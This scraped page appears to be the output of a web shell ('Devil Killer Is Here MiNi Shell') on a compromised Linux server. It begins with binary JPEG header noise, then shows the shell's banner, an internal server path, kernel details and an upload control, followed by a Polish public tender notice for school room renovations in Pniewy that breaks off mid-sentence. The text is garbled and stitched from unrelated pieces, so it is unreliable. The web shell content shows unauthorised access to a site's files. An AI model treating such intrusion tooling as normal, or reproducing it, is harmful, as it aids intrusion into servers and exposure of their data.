JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250709/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250709/0031725701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Remont pomieszczeń w Zespole Szkół im. Emilii Sczanieckiej w Pniewach” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pniewy ZESPÓŁ SZKÓŁ IM. EMILII SCZANIECKIEJ W PNIEWACH</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zespół Szkół im. Emilii Sczanieckiej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000777214</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wolności 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pniewy</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-045</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@pniewy.wlkp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zespolszkolpniewy.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Remont pomieszczeń w Zespole Szkół im. Emilii Sczanieckiej w Pniewach” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e0b432f4-442b-41d6-a13b-9d8f31439cad</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00317257</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00274766/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont pomieszczeń w Zespole Szkół im. Emilii Sczanieckiej w Pniewach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pniewy_wlkp <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający będzie się komunikował z Wykonawcami za pośrednictwem platformy zakupowe- https://platformazakupowa.pl/pn/pniewy_wlkp</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">10. Zamawiający, zgodnie z § 3 ust. 3<br/>Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz. U. z 2017 r. poz. 1320; dalej:<br/>“Rozporządzenie w sprawie środków komunikacji”), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>https://platformazakupowa.pl/pn/pniewy_wlkp</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/pniewy_wlkp</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I.- OPIS PRZEDMIOTU ZAMÓWIENIA<br/>Szczegółowy opis przedmiotu zamówienia dotyczy remontów w Zespole Szkół im. Emilii Sczanieckiej w Pniewach przy ul. Wolności 10 oraz Bursy Szkolnej przy ul. św. Ducha 10 <br/>w Pniewach: <br/><br/>1.	Remont odtworzeniowy łazienek w budynku A (Budynek A kosztorys inwestorski + Budynek A przedmiar robót – 1. 1.1. ( nr poz. 1-15); 1.2. ( nr poz. 16-24); 1.3. (nr poz. 25-31); 1.4.(nr poz.32-35); 1.5. (nr poz. 36-48); 2. 2.1. ( nr poz. 49-54); 3. 3.1. ( nr poz. 55-71); 3.2. (nr poz.72-82); 3.3. (nr poz.83-96); 3.4.( nr poz. 97-106); 3.5.( nr poz. 107-112).<br/><br/>Inwestycja obejmuje przede wszystkim niżej wymienione roboty budowlane:<br/><br/>a)	Rozbiórka istniejących murowanych ścianek kabin sanitarnych<br/>b)	Remont powłok malarskich: zerwanie istniejących okładzin ścian; zeskrobanie <br/>i zmycie starych powłok malarskich; poszpachlowanie ścian i sufitów; wykonanie okładziny ścian do wysokości 2 m z płytek ceramicznych w kolorystyce uzgodnionej z Zamawiającym; malowanie sufitów farbami emulsyjnymi; malowanie ścian farbami emulsyjnymi odpornymi na szorowanie (farby wodorozcieńczalne kolor; udokumentowana odporność na szorowanie w/g PN -EN 13300 Klasa 1)<br/>c)	Remont posadzek: zerwanie istniejących posadzek; wykonanie warstw wyrównawczych pod okładziny z płytek ceramicznych; wykonanie izolacji pod okładziny z płytek ceramicznych; ułożenie posadzek z płytek gresowych<br/>d)	Wymianę stolarki drzwiowej: drzwi wejściowe do sanitariatów bud B - drzwi w 4 klasie użytkowania w zakresie wytrzymałości mechanicznej tj. ciężkie warunki eksploatacji z kompletem okuć do pomieszczeń mokrych drzwi wykończone laminatem odpornym na działanie wilgoci np. wysokociśnieniowym HPL; remont drzwi wejściowych do sanitariatów bud A<br/>e)	Wyposażenie pomieszczeń: wykonanie systemowej zabudowy kabin WC z płyt HPL z okuciami za stali nierdzewnej; wyposażenie łazienek - pojemniki na ręczniki - dozowniki mydła - lustra wklejane - pojemniki na papier toaletowy - szczotki do toalet - kosze na śmieci<br/>f)	Remont instalacji wod-kan i c-o: demontaż wyposażenia sanitarnego oraz instalacji wraz z towarzyszącymi robotami budowlanymi (bruzdy, przekucia ); wykonanie nowych instalacji wody i kanalizacji w obrębie pomieszczeń i częściowo <br/>w piwnicach; budynek A wykonanie odpowietrzenia instalacji kanalizacji; montaż nowej armatury i przyborów sanitarnych - umywalki 55 cm z półpostumentami i bateriami jednuchwytowymi stojącymi - miski ustępowe zawieszane na stelażach w WC dla personelu bud B miska kompakt - pisuary na stelażach - przegrody pisuarowe - kratki ściekowe; wymiana grzejników wraz z zaworami<br/>g)	Częściowy remont instalacji elektrycznych: wymiana osprzętu elektrycznego gniazdka i wyłączniki; wymiana opraw oświetleniowych na oprawy LED<br/>2.	Remont sali lekcyjnej B4 w budynku B (Budynek B kosztorys inwestorski + Budynek B przedmiar robót – 1.; 1.1.; 1.1.1. ( nr poz. 1-13) + 1.1.2. ( nr poz. 14-35)<br/><br/>Inwestycja obejmuje przede wszystkim niżej wymienione roboty budowlane:<br/><br/>a)	Roboty posadzkowe: zerwanie wykładziny podłogowej i podkładów, przygotowanie istniejącej podłogi; montaż nowej podłogi z płyt OSB 18mm ⦁ wykonanie warstwy szczepnej pod płyty kompensacyjne (masa samopoziomująca cementowa szybkowiążąca, wzmocniona włóknami, elastycznymi) ⦁ wzmocnienie podłoża płytami z włókien poliestrowych (płyty wytworzone na bazie żywic syntetycznych, odporne na proces starzenia wzmacniające pod ułożenie okładziny ceramicznej ) ⦁ ułożenie okładziny posadzki z płytek ceramicznych (płytki prostokątne wzór do uzgodnienie z Zamawiającym wymiary ok 600/600 mm klasa ścieralności nie mniej niż PEI 4 klasa antypoślizgowości nie mniej niż R10)<br/>b)	Roboty malarskie: zmycie starych powłok malarskich; skasowanie wykwitów na ścianach; drobne naprawy tynków (odkucie odparzonych tynków i ich uzupełnienie); przygotowanie powierzchni do malowania przez szpachlowanie; malowanie -sufitów farby wodorozcieńczalne białe, ścian farbami (farby wodorozcieńczalne; udokumentowana odporność na szorowanie w/g PN-EN 13300 Klasa 1) kolor do uzgodnienia z Zamawiającym, elementów metalowych (rury i grzejniki); lakierowanie lamperii -akrylowy lakier ochronno-dekoracyjny, <br/>z wykończeniem w półmatowym do zabezpieczania powłok wewnętrznych malowanych farbami wodorozcieńczalnymi; montaż samoprzylepnej odbojnicy poliuretanowej szer. 25<br/>ZAMAWIAJĄCY INFORMUJE, ŻE w przedmiarze robót nie należy kalkulować: <br/>1.2. Malowanie sala B9 (nr poz. 36-56)<br/><br/>3.	Wymiana drzwi sekretariat C1 oraz sal C2 i C3 w budynku C (Budynek C kosztorys inwestorski + Budynek C przedmiar robót – 1.; 1.1. ( nr poz. 1-5) +1.2. (nr poz. 6-10)<br/>Inwestycja obejmuje przede wszystkim niżej wymienione roboty budowlane:<br/>a)	wykucie istniejących drzwi; montaż nowych drzwi aluminiowych skrzydła półpełne (częściowo przeszklone) szyby szkło bezpieczne (profile ALUPROF kolor do uzgodnienia z Zamawiającym); obróbka osadzenia drzwi wraz z pomalowaniem farby odporne na szorowanie<br/><br/>ZAMAWIAJĄCY INFORMUJE, ŻE w przedmiarze robót nie należy kalkulować: <br/>1.3. Malowanie sala C11 (nr poz. 11-30)<br/>1.4. Malowanie sala C12 (nr poz. 31-51)<br/><br/><br/><br/>4.	Remont Sali 209 w Bursie Szkolnej (Bursa kosztorys inwestorski + Bursa przedmiar robót – 1.; 1.1.; 1.1.1. ( nr poz. 1-13) + 1.1.2. ( nr poz. 14-27)<br/><br/><br/>Inwestycja obejmuje przede wszystkim niżej wymienione roboty budowlane:<br/><br/>a)	Roboty posadzkowe: zerwanie istniejącej okładziny podłogowej i podkładów ; wykonanie warstwy wyrównawczej (masa samopoziomująca, wzmocniona włóknami, elastycznymi); ułożenie okładziny posadzki z płytek ceramicznych (płytki prostokątne wzór do uzgodnienie z Zamawiającym wymiary do uzgodnienia z Zamawiającym klasa ścieralności nie mniej niż PEI 4 klasa antypoślizgowości nie mniej niż R10)<br/>b)	Roboty malarskie: zmycie starych powłok malarskich; skasowanie wykwitów na ścianach; drobne naprawy tynków (odkucie odparzonych tynków i ich uzupełnienie); przygotowanie powierzchni do malowania; malowanie-sufitów farby wodorozcieńczalne białe oraz ścian farbami, elementów metalowych (rury i grzejniki); lakierowanie lamperii - akrylowy lakier ochronno-dekoracyjny, z wykończeniem w półmatowym do zabezpieczania powłok wewnętrznych malowanych farbami wodorozcieńczalnymi; montaż samoprzylepnej odbojnicy poliuretanowej szer. 25<br/><br/>ZAMAWIAJĄCY INFORMUJE, ŻE w przedmiarze robót nie należy kalkulować: <br/>1.2. Malowanie korytarz (nr poz. 28-38)<br/>1.3. Malowanie pokoju mieszkalnego (nr poz. 39-49) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45214220-8 - Roboty budowlane w zakresie szkół średnich</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Prawo zamówień publicznych polegających na powtórzeniu podobnych robót budowlanych do wysokości do 50% wartości zamówienia podstawowego z zastrzeżeniem zmian terminów realizacji oraz cen jednostkowych po przeprowadzonych negocjacjach. Zamówienie zostanie udzielone w przypadku, gdy zaistnieje uzasadniona potrzeba rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel. Zamawiający może udzielić jednego zamówienia lub kilku zamówień na ten zakres robót.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II- OPIS PRZEDMIOTU ZAMÓWIENIA<br/>Szczegółowy opis przedmiotu zamówienia dotyczy remontu w Zespole Szkół im. Emilii Sczanieckiej w Pniewach przy ul. św. Ducha 11, w Pniewach: <br/><br/>1.	Remont pokoju nauczycielskiego w Liceum Ogólnokształcącym (Liceum kosztorys inwestorski + Liceum przedmiar robót – 1.; 1.1. (nr poz. 1-12) + 1.2. (nr poz. 13-28 )<br/>+ 1.3. (nr poz. 29-36)<br/><br/>UWAGA w związku z tym, ze budynek liceum objęty jest ochroną konserwatora zabytków na remont pomieszczeń została opracowana przez biuro projektowe A.DO XXI ul. Trybunalska Poznań dokumentacja techniczna w której wskazano szczegółowo rozwiązania techniczne, technologiczne i parametry poszczególnych materiałów jakich można używać przy realizacji zamówienia. W związku z powyższym na etapie przygotowania do realizacji zamówienia należy bezwzględnie zapoznać się z dokumentacją projektową <br/><br/>Inwestycja obejmuje przede wszystkim niżej wymienione roboty budowlane:<br/>a)	Roboty posadzkowe: zerwanie wykładziny podłogowej i podkładów; przygotowanie istniejącej podłogi; montaż nowej podłogi z płyt OSB; wykonanie warstwy szczepnej pod wylewki); wykonanie wylewki wzmocnionej siatką; ułożenie homogenicznej wykładziny winylowej o parametrach wskazanych w projekcie<br/>b)	Roboty malarskie: zmycie starych powłok malarskich; skasowanie wykwitów na ścianach; drobne naprawy tynków (odkucie odparzonych tynków i ich uzupełnienie); przygotowanie powierzchni do malowania przez szpachlowanie; malowanie - sufitów farby wapienne wg wytycznych projektowych wodorozcieńczalne białe, ścian farbami farby wodorozcieńczalne odporne na szorowanie Klasa 1 wg wytycznych projektowych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45214220-8 - Roboty budowlane w zakresie szkół średnich</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Prawo zamówień publicznych polegających na powtórzeniu podobnych robót budowlanych do wysokości do 50% wartości zamówienia podstawowego z zastrzeżeniem zmian terminów realizacji oraz cen jednostkowych po przeprowadzonych negocjacjach. Zamówienie zostanie udzielone w przypadku, gdy zaistnieje uzasadniona potrzeba rozszerzenia zamówienia podstawowego i zostaną zapewnione środki finansowe na ten cel. Zamawiający może udzielić jednego zamówienia lub kilku zamówień na ten zakres robót.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Czytać właściwe dla danej części: <br/><br/>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej: Wykonawca spełni warunek jeżeli wykaże, że:<br/>Zamawiający nie stawia warunku w powyższym zakresie;<br/>4)	zdolności technicznej lub zawodowej:<br/>Dla części I zamówienia: <br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>a)	w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał minimum 1 robotę 